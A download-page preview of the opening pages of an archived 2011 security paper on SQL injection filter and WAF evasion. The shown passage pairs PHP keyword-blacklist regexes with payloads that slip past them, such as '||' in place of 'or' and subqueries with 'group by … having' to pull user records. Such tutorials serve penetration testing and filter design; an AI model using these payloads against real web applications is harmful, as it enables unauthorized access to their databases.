没有合适的资源?快使用搜索试试~ 我知道了~
《Beyond_SQLi_Obfuscate_and_Bypass》.pdf
1.该资源内容由用户上传,如若侵权请联系客服进行举报
2.虚拟产品一经售出概不退款(资源遇到问题,请及时私信上传者)
2.虚拟产品一经售出概不退款(资源遇到问题,请及时私信上传者)
版权申诉
0 下载量 122 浏览量
2021-11-28
16:00:43
上传
评论
收藏 1.24MB PDF 举报
温馨提示
试读
20页
网络,安全
资源推荐
资源详情
资源评论
2016/9/5 Vulnerability analysis, Security Papers, Exploit Tutorials - Part 17934
https://www.exploit-db.com/papers/17934/ 1/20
Beyond SQLi: Obfuscate and Bypass
Archived security papers and articles in various languages.
|=---------------------------------------------
-----------------------=|
|=--------------=[ Beyond SQLi: Obfuscate and
Bypass ]=---------------=|
|=-------------------------=[ 6 October 2011
]=-----------------------=|
|=----------------------=[ By CWH Underground
]=--------------------=|
|=---------------------------------------------
-----------------------=|
######
Info
######
Title : Beyond SQLi: Obfuscate and Bypass
Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot
Boonchamnan"
Team : CWH Underground [http://www.exploit-db.com/author/?
a=1275]
Date : 2011-10-06
##########
Contents
##########
[0x00] - Introduction
[0x01] - Filter Evasion (Mysql)
[0x01a] - Bypass Functions and Keywords
Filtering
[0x01b] - Bypass Regular Expression Filtering
[0x02] - Normally Bypassing Techniques
[0x03] - Advanced Bypassing Techniques
[0x03a] - HTTP Parameter Pollution: Split and
2016/9/5 Vulnerability analysis, Security Papers, Exploit Tutorials - Part 17934
https://www.exploit-db.com/papers/17934/ 2/20
Join
[0x03b] - HTTP Parameter Contamination
[0x04] - How to protect your website
[0x05] - Conclusion
[0x06] - References
[0x07] - Greetz To
#######################
[0x00] - Introduction
#######################
Welcome readers, this paper is a long attempt at
documenting advanced SQL injection we have been working on.
This papers will disclose advanced bypassing and obfuscation
techniques which many of them can be used in the real CMSs and
WAFs. The proposed SQL injection statements in this paper are
just some ways to bypass the protection.
There are still some other techniques can be used to attacks
web applications but unfortunately we cannot tell you right
now, as it is kept as a 0-day attack. However, this paper aims
to show that there is no completely secure system
in the real world even though you spend more than 300,000 USD
on a WAF.
This paper is divided into 7 sections but only from
section 0x01 to 0x03 are about technical information.
Section 0x01, we give a details of how to bypass filter
including basic, function and keyword.
Section 0x02, we offer normally bypassing techniques for bypass
OpenSource and Commercial WAF.
Section 0x03, we talk in-depth Advanced bypassing techniques
that separate into 2 section, "HTTP Parameter Contamination".
and "HTTP Pollution: Split and Join". Section 0x04, we guide to
protect your own website on the right solution.
The last, section 0x05, It's conclusion from Section 0x01-0x04.
#################################
[0x01] - Filter Evasion (Mysql)
#################################
This section will describe filter evasion behaviors
based on PHP and MySQL and how to bypass the filtering. Filter
Evasion is a technique used to prevent SQL injection attacks.
This technique can be done by using a SQL functions and
keywords filtering or regular expressions.
2016/9/5 Vulnerability analysis, Security Papers, Exploit Tutorials - Part 17934
https://www.exploit-db.com/papers/17934/ 3/20
This means that filter evasion relies heavily upon how storing
a black list or regular expression is. If the black list or
regular expression does not cover every injection scenario, the
web application is still vulnerable to SQL Injection attacks.
+++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01a] - Bypass Functions and Keywords Filtering
+++++++++++++++++++++++++++++++++++++++++++++++++++
Functions and keywords filtering prevents web
applications from being attacked by using a functions and
keywords black list. If an attackers submits an injection code
containing a keyword or SQL function in the black list, the
injection will be unsuccessful.
However, if the attacker is able to manipulate the
injection by using another keyword or function, the black list
will fail to prevent the attack. In order to prevent attacks, a
number of keywords and functions has to be put into the black
list. However, this affects users
when the users want to submit input with a word in the
black list. They will be unable to submit the input because it
is being filtered by the black list. The following scenarios
show cases of using functions and keywords filtering and
bypassing techniques.
Keyword filer: and, or
-----------------------------------------------
-----------------------
PHP filter code:
preg_match('/(and|or)/i', $id)
THe keywords and, or are usually used as a
simple test to determine whether a web application is
vulnerable to SQL Injection attacks. Here is a simple bypass
using &&, || instead of and, or respectively.
Filtered injection: 1 or 1 = 1
1 and 1 = 1
Bypassed injection: 1 || 1 = 1
1 && 1 = 1
-----------------------------------------------
-----------------------
Keyword filer: and, or, union
-----------------------------------------------
-----------------------
PHP filter code:
preg_match('/(and|or|union)/i', $id)
The keyword union is generally used to generate
2016/9/5 Vulnerability analysis, Security Papers, Exploit Tutorials - Part 17934
https://www.exploit-db.com/papers/17934/ 4/20
an malicious statement in order to select extra data from the
database.
Filtered injection: union select user,
password from users
Bypassed injection: 1 || (select user from
users where user_id = 1) = 'admin'
** Remark: you have to know table name, column
name and some data in the table, otherwise you have to get it
from information_schema.columns table using other statement
e.g. use substring function to get each
character of table names.
-----------------------------------------------
-----------------------
Keyword filer: and, or, union, where
-----------------------------------------------
-----------------------
PHP filter code:
preg_match('/(and|or|union|where)/i', $id)
Filtered injection: 1 || (select user from
users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from
users limit 1) = 'admin'
-----------------------------------------------
-----------------------
Keyword filer: and, or, union, where,
limit
-----------------------------------------------
-----------------------
PHP filter code:
preg_match('/(and|or|union|where|limit)/i', $id)
Filtered injection: 1 || (select user from
users limit 1) = 'admin'
Bypassed injection: 1 || (select user from
users group by user_id having user_id = 1) = 'admin'
-----------------------------------------------
-----------------------
Keyword filer: and, or, union, where,
limit, group by
-----------------------------------------------
-----------------------
PHP filter code:
preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered injection: 1 || (select user from
users group by user_id having user_id = 1) = 'admin'
剩余19页未读,继续阅读
资源评论
陆小马
- 粉丝: 732
- 资源: 2051
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功